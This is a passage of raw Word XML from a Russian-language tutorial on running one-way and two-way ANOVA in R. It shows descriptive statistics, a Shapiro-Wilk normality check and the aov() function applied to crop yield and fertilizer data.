      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>, для того чтобы понять, что за данные перед нами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CB7B0" w14:textId="326495B5" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C0C9D88" wp14:editId="08EACA6E">
            <wp:extent cx="3352800" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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52800" cy="1400175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF9336" w14:textId="148D178D" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>результат проведения описательных статистик</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF41E8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:r>
        <w:t>Колонки</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">показывают сумму наблюдений по каждому уровню фактора. Колонка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>отображает базовую статистику</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>min</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">минимальное значение, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qu</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">первый квартиль (25% от всех наблюдений), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Median</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">медиана, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mean</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>среднее, 3</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qu</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">третий квартиль (75% от всех наблюдений), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Max</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>максимальное значение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050301A" w14:textId="1337E4A4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:r>
        <w:t>Дисперсионный анализ можно проводить только на нормально распределённых данных</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>Е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сли данные имеют другой характер распределения, то </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">уровень значимости и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>-критерий Фишера дадут неверный результат. Для того чтобы узнать имеют ли данные нормальное распределение, необходимо провести тест Шапиро-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Уилка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с помощью команды </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>shapiro.test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data$yield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5258F2" w14:textId="609C19FA" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B042B98" wp14:editId="37A8C50B">
            <wp:extent cx="3152775" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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52775" cy="971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="252B0D5D" w14:textId="0F3E5852" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результат проведения тест Шапиро-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Уилка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FAC6D44" w14:textId="6EF50A2A" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:r>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>уровень значимости больше критического 0.05, то можно утверждать, что распределение данных существенно не отличается от нормального распределения. Другими словами</w:t>
      </w:r>
      <w:r w:rsidRPr="001F707C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> можно предположить нормальность и продолжить проведение дисперсионного анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E8CAA8" w14:textId="7F2624A6" w:rsidR="0093378B" w:rsidRPr="00461F77" w:rsidRDefault="0093378B" w:rsidP="00461F77">
      <w:r>
        <w:t xml:space="preserve">Для проведения однофакторного дисперсионного анализа необходимо воспользоваться стандартной функцией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67F95">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>one.way.fert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">где первый параметр – это результирующая переменная и фактор, который мы хотим исследовать, второй параметр – источника данных (рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B359BC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Результаты проведения анализа отображаются инструкцией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>one.way.fert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18865ECF" w14:textId="09BFFC08" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00461F77">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A09411B" wp14:editId="25D8D068">
            <wp:extent cx="4972050" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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972050" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EFF90C" w14:textId="422422D6" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00461F77">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>результаты проведения однофакторного дисперсионного анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12323700" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00461F77">
      <w:r>
        <w:t xml:space="preserve">В сводке сначала перечислены независимые переменные, подставленные в модели (в данном случая есть только одна – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>, а также остатки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Residuals</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>внутригрупповая дисперсия (её ещё называют шумовой или остаточной дисперсией – в том смысле, что она не может быть объяснена влиянием экспериментального фактора). Остальные значения в выходной таблице описывают независимую переменную и остатки, где</w:t>
      </w:r>
      <w:r w:rsidRPr="00461F77">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74B55F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009A20F6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Df</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">количество степеней свободы (в данном случае количество градаций фактора минус один). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Df</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>остатков – общее количество наблюдений минус один и минус количество градаций факторов независимых переменных;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375EC418" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009A20F6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sum</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sq</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>сумма квадратов отклонений (общее различие между средними значениями группы и общим средним значением);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4995AA9B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009A20F6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mean</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sq</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>среднее значение суммы квадратов отклонений, рассчитанное путём деления суммы квадратов отклонений на количество степени свободы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEC6A4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="009A20F6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91B15">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>фактическое значение Фишера (среднее значение суммы квадратов отклонений независимой переменной делённое на среднее значение суммы квадратов отклонений остатков).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD73C3F" w14:textId="4CA8F401" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>уровень значимости достаточно низк</w:t>
      </w:r>
      <w:r w:rsidR="003D2BA6">
        <w:t>ий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> &lt; 0.001</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), следовательно можно утверждать, что фактор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">оказывает значимое влияние на переменную </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>однофакторный дисперсионный анализ проведён успешно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2F1F57" w14:textId="13D82D9C" w:rsidR="0093378B" w:rsidRPr="007876D1" w:rsidRDefault="0093378B" w:rsidP="007876D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для проведения двухфакторного дисперсионного анализа необходимо использовать ту же функцию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>но с изменёнными параметрами</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>two.way</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>aov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Знак</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A1170">
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="004A1170">
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> указывает на то, что необходимо узнать влияние каждого фактора по отдельности, а также влияние взаимодействия факторов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="007876D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
